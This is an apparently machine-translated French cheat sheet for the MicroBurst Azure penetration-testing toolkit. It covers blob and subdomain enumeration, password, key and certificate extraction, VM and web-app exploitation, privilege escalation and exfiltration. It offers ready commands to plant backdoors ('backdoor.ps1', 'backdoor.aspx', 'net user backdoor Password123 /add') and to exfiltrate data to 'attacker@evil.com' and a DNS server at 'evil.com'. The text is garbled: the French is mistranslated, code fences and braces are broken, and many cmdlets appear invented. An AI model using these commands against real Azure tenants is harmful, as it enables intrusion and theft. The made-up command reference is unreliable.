MicroBurst Azure Sécurité Test Toolkit Cheat Sheet
Aperçu général
MicroBurst est une collection de scripts PowerShell développés par NetSPI pour évaluer la sécurité de Microsoft Azure. Il comprend des outils pour la découverte du service Azure, l'escalade des privilèges, le mouvement latéral et l'exfiltration de données, ce qui en fait une trousse complète pour les tests de pénétration Azure.
C'est pas vrai. Attention : Cet outil est destiné uniquement aux tests de pénétration et aux évaluations de sécurité autorisés. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.
Installation
Installation de la galerie PowerShell
# Install from PowerShell Gallery
Install-Module -Name MicroBurst
# Install for current user only
Install-Module -Name MicroBurst -Scope CurrentUser
# Update existing installation
Update-Module -Name MicroBurst
# Import module
Import-Module MicroBurst
Installation manuelle
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/NetSPI/MicroBurst/archive/master.zip" -OutFile "MicroBurst.zip"
Expand-Archive -Path "MicroBurst.zip" -DestinationPath "C:\Tools\"
# Import module
Import-Module C:\Tools\MicroBurst-master\MicroBurst.psd1
# Install dependencies
Install-Module -Name Az
Install-Module -Name AzureAD
```_
### Installation Git
```bash
# Clone repository
git clone https://github.com/NetSPI/MicroBurst.git
cd MicroBurst
# Import in PowerShell
Import-Module .\MicroBurst.psd1
```_
## Utilisation de base
### Configuration du module
```powershell
# Import MicroBurst
Import-Module MicroBurst
# Get available commands
Get-Command -Module MicroBurst
# Get help for specific function
Get-Help Invoke-EnumerateAzureBlobs -Full
# Check module version
Get-Module MicroBurst
Authentification
# Interactive authentication
Connect-AzAccount
# Service principal authentication
$credential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"
# Certificate authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"
Référence de commande
Fonctions de reconnaissance
| Function | Description |
|---|---|
Invoke-EnumerateAzureBlobs |
Enumerate Azure storage blobs |
Invoke-EnumerateAzureSubDomains |
Enumerate Azure subdomains |
Get-AzurePasswords |
Extract passwords from Azure resources |
Get-AzureDomainInfo |
Get domain information |
Invoke-AzureRmVmBulkCMD |
Execute commands on multiple VMs |
Fonctions des comptes de stockage
| Function | Description |
|---|---|
Invoke-EnumerateAzureBlobs |
Find accessible storage blobs |
Get-AzureBlobFiles |
Download files from storage |
Invoke-AzureStorageAccountEnum |
Enumerate storage accounts |
Get-AzureStorageAccountKeys |
Extract storage account keys |
Fonctions de la machine virtuelle
| Function | Description |
|---|---|
Invoke-AzureRmVmBulkCMD |
Bulk command execution |
Get-AzureVMDisk |
Access VM disk information |
Invoke-AzureVMUserDataEnum |
Enumerate VM user data |
Get-AzureVMExtensionSettings |
Get VM extension settings |
Dénombrement de stockage Azure
Blob Storage Discovery
# Basic blob enumeration
Invoke-EnumerateAzureBlobs -Base "company"
# Enumerate with custom wordlist
Invoke-EnumerateAzureBlobs -Base "company" -Wordlist "custom-wordlist.txt"
# Enumerate specific containers
Invoke-EnumerateAzureBlobs -Base "company" -Containers @("backup", "logs", "data")
# Enumerate with threading
Invoke-EnumerateAzureBlobs -Base "company" -Threads 10
Énumération des comptes de stockage
# Enumerate storage accounts
Invoke-AzureStorageAccountEnum -SubscriptionId "subscription-id"
# Get storage account keys
Get-AzureStorageAccountKeys -StorageAccountName "storageaccount"
# Enumerate storage containers
Get-AzureStorageContainers -StorageAccountName "storageaccount"
# Download files from storage
Get-AzureBlobFiles -StorageAccountName "storageaccount" -ContainerName "container" -OutputPath "C:\Downloads\"
Numérotation de partage de fichiers
# Enumerate file shares
Get-AzureFileShares -StorageAccountName "storageaccount"
# Access file share contents
Get-AzureFileShareContents -StorageAccountName "storageaccount" -ShareName "share"
# Download files from file share
Get-AzureFileShareFiles -StorageAccountName "storageaccount" -ShareName "share" -OutputPath "C:\Downloads\"
Sous-domaine et service Découverte
Énumération du sous-domaine Azure
# Basic subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base "company"
# Enumerate with custom services
Invoke-EnumerateAzureSubDomains -Base "company" -Services @("azurewebsites", "blob", "queue", "table")
# Enumerate with permutations
Invoke-EnumerateAzureSubDomains -Base "company" -Permutations @("dev", "test", "prod", "staging")
# Save results to file
Invoke-EnumerateAzureSubDomains -Base "company" -OutputFile "subdomains.txt"
Découverte des services
# Discover Azure services
Get-AzureServices -Domain "company.com"
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Discover SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Find Key Vaults
Get-AzureKeyVaults -SubscriptionId "subscription-id"
Énumération DNS
# Enumerate DNS records
Get-AzureDNSRecords -Domain "company.com"
# Check for zone transfers
Test-AzureDNSZoneTransfer -Domain "company.com"
# Enumerate subdomains via DNS
Get-AzureSubdomainsDNS -Domain "company.com" -Wordlist "subdomains.txt"
Exploitation virtuelle de machines
Exécution de la commande VM
# Execute command on single VM
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -Command "whoami"
# Execute commands on multiple VMs
$vms = @("vm1", "vm2", "vm3")
Invoke-AzureRmVmBulkCMD -VMNames $vms -ResourceGroupName "rg-name" -Command "systeminfo"
# Execute PowerShell script on VMs
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "C:\Scripts\enum.ps1"
Accès au disque VM
# Get VM disk information
Get-AzureVMDisk -VMName "vm-name" -ResourceGroupName "rg-name"
# Create disk snapshot
New-AzureVMDiskSnapshot -VMName "vm-name" -ResourceGroupName "rg-name"
# Mount disk snapshot
Mount-AzureVMDiskSnapshot -SnapshotName "snapshot-name" -MountPoint "E:\"
# Extract data from mounted disk
Get-AzureVMDiskData -MountPoint "E:\" -OutputPath "C:\Extracted\"
Exploitation par extension de VM
# Get VM extension settings
Get-AzureVMExtensionSettings -VMName "vm-name" -ResourceGroupName "rg-name"
# Install custom extension
Install-AzureVMCustomExtension -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "backdoor.ps1"
# Execute via extension
Invoke-AzureVMExtensionCommand -VMName "vm-name" -ResourceGroupName "rg-name" -Command "net user backdoor Password123 /add"
Extraction de titres de créance et de secrets
Extraction du mot de passe
# Extract passwords from Azure resources
Get-AzurePasswords -SubscriptionId "subscription-id"
# Extract passwords from specific resource types
Get-AzurePasswords -ResourceTypes @("VirtualMachines", "WebApps", "Databases")
# Extract passwords from Key Vaults
Get-AzureKeyVaultPasswords -KeyVaultName "keyvault-name"
# Extract connection strings
Get-AzureConnectionStrings -SubscriptionId "subscription-id"
Extraction du certificat
# Extract certificates from Key Vault
Get-AzureKeyVaultCertificates -KeyVaultName "keyvault-name"
# Extract certificates from web apps
Get-AzureWebAppCertificates -WebAppName "webapp-name"
# Export certificates
Export-AzureCertificates -OutputPath "C:\Certificates\"
Configuration Extraction de données
# Extract application settings
Get-AzureAppSettings -WebAppName "webapp-name"
# Extract environment variables
Get-AzureEnvironmentVariables -ResourceGroupName "rg-name"
# Extract deployment credentials
Get-AzureDeploymentCredentials -WebAppName "webapp-name"
Exploitation des bases de données
Énumération des bases de données SQL
# Enumerate SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Get SQL server information
Get-AzureSQLServerInfo -ServerName "sqlserver-name"
# Check SQL firewall rules
Get-AzureSQLFirewallRules -ServerName "sqlserver-name"
# Test SQL connectivity
Test-AzureSQLConnectivity -ServerName "sqlserver-name" -DatabaseName "database-name"
Accès à la base de données SQL
# Connect to SQL database
Connect-AzureSQLDatabase -ServerName "sqlserver-name" -DatabaseName "database-name" -Credential $cred
# Execute SQL queries
Invoke-AzureSQLQuery -ServerName "sqlserver-name" -DatabaseName "database-name" -Query "SELECT * FROM users"
# Extract database schema
Get-AzureSQLSchema -ServerName "sqlserver-name" -DatabaseName "database-name"
# Dump database data
Export-AzureSQLData -ServerName "sqlserver-name" -DatabaseName "database-name" -OutputPath "C:\SQLDump\"
Exploitation de CosmosDB
# Enumerate CosmosDB accounts
Get-AzureCosmosDBAccounts -SubscriptionId "subscription-id"
# Get CosmosDB keys
Get-AzureCosmosDBKeys -AccountName "cosmosdb-account"
# Access CosmosDB data
Get-AzureCosmosDBData -AccountName "cosmosdb-account" -DatabaseName "database" -ContainerName "container"
Exploitation des applications Web
Énumération des applications Web
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Get web app configuration
Get-AzureWebAppConfig -WebAppName "webapp-name"
# Check web app authentication
Get-AzureWebAppAuth -WebAppName "webapp-name"
# Get web app deployment slots
Get-AzureWebAppSlots -WebAppName "webapp-name"
Exploitation des applications Web
# Access web app files via Kudu
Get-AzureWebAppFiles -WebAppName "webapp-name" -Path "/site/wwwroot/"
# Execute commands via Kudu
Invoke-AzureWebAppCommand -WebAppName "webapp-name" -Command "dir"
# Upload backdoor file
Upload-AzureWebAppFile -WebAppName "webapp-name" -LocalPath "backdoor.aspx" -RemotePath "/site/wwwroot/"
# Access web app logs
Get-AzureWebAppLogs -WebAppName "webapp-name"
Fonction App Exploitation
# Enumerate function apps
Get-AzureFunctionApps -SubscriptionId "subscription-id"
# Get function app keys
Get-AzureFunctionAppKeys -FunctionAppName "functionapp-name"
# Execute function
Invoke-AzureFunction -FunctionAppName "functionapp-name" -FunctionName "function-name" -Payload $payload
# Access function app files
Get-AzureFunctionAppFiles -FunctionAppName "functionapp-name"
Escalade des privilèges
Énumération des attributions de rôles
# Get current user roles
Get-AzureCurrentUserRoles
# Enumerate role assignments
Get-AzureRoleAssignments -SubscriptionId "subscription-id"
# Find privilege escalation paths
Find-AzurePrivEscPaths -SubscriptionId "subscription-id"
# Check for dangerous permissions
Get-AzureDangerousPermissions -SubscriptionId "subscription-id"
Chef de service Abus
# Enumerate service principals
Get-AzureServicePrincipals -SubscriptionId "subscription-id"
# Get service principal credentials
Get-AzureServicePrincipalCredentials -ServicePrincipalId "sp-id"
# Abuse service principal permissions
Invoke-AzureServicePrincipalAbuse -ServicePrincipalId "sp-id" -Action "CreateUser"
Exploitation de l'identité gérée
# Check for managed identity
Test-AzureManagedIdentity
# Get managed identity token
Get-AzureManagedIdentityToken -Resource "https://management.azure.com/"
# Use managed identity for privilege escalation
Invoke-AzureManagedIdentityPrivEsc -TargetResource "subscription"
Mouvement latéral
Abonnement croisé Accès
# Enumerate accessible subscriptions
Get-AzureAccessibleSubscriptions
# Switch subscription context
Set-AzureSubscriptionContext -SubscriptionId "target-subscription-id"
# Enumerate resources in target subscription
Get-AzureResourcesInSubscription -SubscriptionId "target-subscription-id"
Accès à des cours croisés
# Enumerate accessible tenants
Get-AzureAccessibleTenants
# Switch tenant context
Set-AzureTenantContext -TenantId "target-tenant-id"
# Enumerate resources in target tenant
Get-AzureResourcesInTenant -TenantId "target-tenant-id"
Groupe de ressources
# Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"
# Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"
# Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg"
Exfiltration des données
Extraction de données en vrac
# Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"
# Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"
# Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress
Exfiltration de vol
# Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"
# Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"
# Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com"
Automatisation et écriture
Script d'évaluation automatisé
# Comprehensive Azure assessment
param(
[string]$SubscriptionId,
[string]$OutputPath = "C:\AzureAssessment"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force
# Authenticate
Connect-AzAccount
# Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId
# Enumerate subdomains
Write-Host "Enumerating subdomains..."
$subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name
$subdomains|Out-File "$OutputPath\subdomains.txt"
# Enumerate storage blobs
Write-Host "Enumerating storage blobs..."
$blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name
$blobs|Out-File "$OutputPath\blobs.txt"
# Extract passwords
Write-Host "Extracting passwords..."
$passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId
$passwords|Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation
# Get VM information
Write-Host "Gathering VM information..."
$vms = Get-AzVM
$vms|Export-Csv "$OutputPath\vms.csv" -NoTypeInformation
# Generate summary report
$summary = @\\\\{
AssessmentDate = Get-Date
SubscriptionId = $SubscriptionId
SubdomainsFound = $subdomains.Count
BlobsFound = $blobs.Count
PasswordsFound = $passwords.Count
VMsFound = $vms.Count
\\\\}
$summary|ConvertTo-Json|Out-File "$OutputPath\summary.json"
Write-Host "Assessment completed. Results saved to $OutputPath"
Surveillance continue
# Continuous Azure monitoring
param(
[int]$IntervalMinutes = 60,
[string]$LogPath = "C:\AzureMonitoring\monitor.log"
)
while ($true) \\\\{
$timestamp = Get-Date
Write-Output "[$timestamp] Starting Azure monitoring cycle"|Tee-Object -FilePath $LogPath -Append
try \\\\{
# Check for new storage accounts
$newStorage = Get-AzStorageAccount|Where-Object \\\\{$_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newStorage) \\\\{
Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new VMs
$newVMs = Get-AzVM|Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newVMs) \\\\{
Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new role assignments
$newRoles = Get-AzRoleAssignment|Where-Object \\\\{$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newRoles) \\\\{
Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
\\\\}
catch \\\\{
Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)"|Tee-Object -FilePath $LogPath -Append
\\\\}
Start-Sleep -Seconds ($IntervalMinutes * 60)
\\\\}
Dépannage
Questions d'authentification
# Clear cached credentials
Clear-AzContext -Force
# Test authentication
$context = Get-AzContext
if (-not $context) \\\\{
Write-Error "Not authenticated to Azure"
Connect-AzAccount
\\\\}
# Verify subscription access
Get-AzSubscription
Questions liées au module
# Check MicroBurst installation
Get-Module MicroBurst -ListAvailable
# Update MicroBurst
Update-Module MicroBurst -Force
# Check dependencies
Get-Module Az -ListAvailable
Questions relatives à la permission
# Check current permissions
$roleAssignments = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id
$roleAssignments|Select-Object RoleDefinitionName, Scope
# Test specific permissions
try \\\\{
Get-AzStorageAccount -ErrorAction Stop
Write-Output "Storage account read permission: OK"
\\\\}
catch \\\\{
Write-Output "Storage account read permission: DENIED"
\\\\}
Intégration avec d'autres outils
Intégration de BloodHound
# Export data for BloodHound
$azureData = @\\\\{
users = Get-AzADUser
groups = Get-AzADGroup
servicePrincipals = Get-AzADServicePrincipal
roleAssignments = Get-AzRoleAssignment
\\\\}
# Convert to BloodHound format
$bloodhoundData = Convert-AzureToBloodHound -Data $azureData
$bloodhoundData|ConvertTo-Json -Depth 3|Out-File "azure_bloodhound.json"
Intégration des métadonnées
# Metasploit module for MicroBurst
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = \\\\{\\\\})
super(update_info(info,
'Name' => 'Azure MicroBurst Integration',
'Description' => 'Execute MicroBurst functions via Metasploit',
'Author' => ['NetSPI'],
'License' => MSF_LICENSE
))
register_options([
OptString.new('SUBSCRIPTION_ID', [true, 'Azure Subscription ID']),
OptString.new('FUNCTION', [true, 'MicroBurst function to execute'])
])
end
def run
subscription_id = datastore['SUBSCRIPTION_ID']
function = datastore['FUNCTION']
# Execute MicroBurst function
powershell_cmd = "Import-Module MicroBurst; #\\\\{function\\\\} -SubscriptionId #\\\\{subscription_id\\\\}"
print_status("Executing: #\\\\{powershell_cmd\\\\}")
# Execute PowerShell command
end
end
Ressources
- [Résistoire Microsoft GitHub] (LINK_5)
- [Blogue NetSPI] (LINK_5)
- [Documentation de sécurité de l'Azure] (LINK_5)
- [Essais de pénétration de l'Azure] (LINK_5)
- [Tactique de l'équipe rouge d'Azure] (LINK_5)
*Cette feuille de triche fournit une référence complète pour l'utilisation de MicroBurst. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer des évaluations de sécurité Azure. *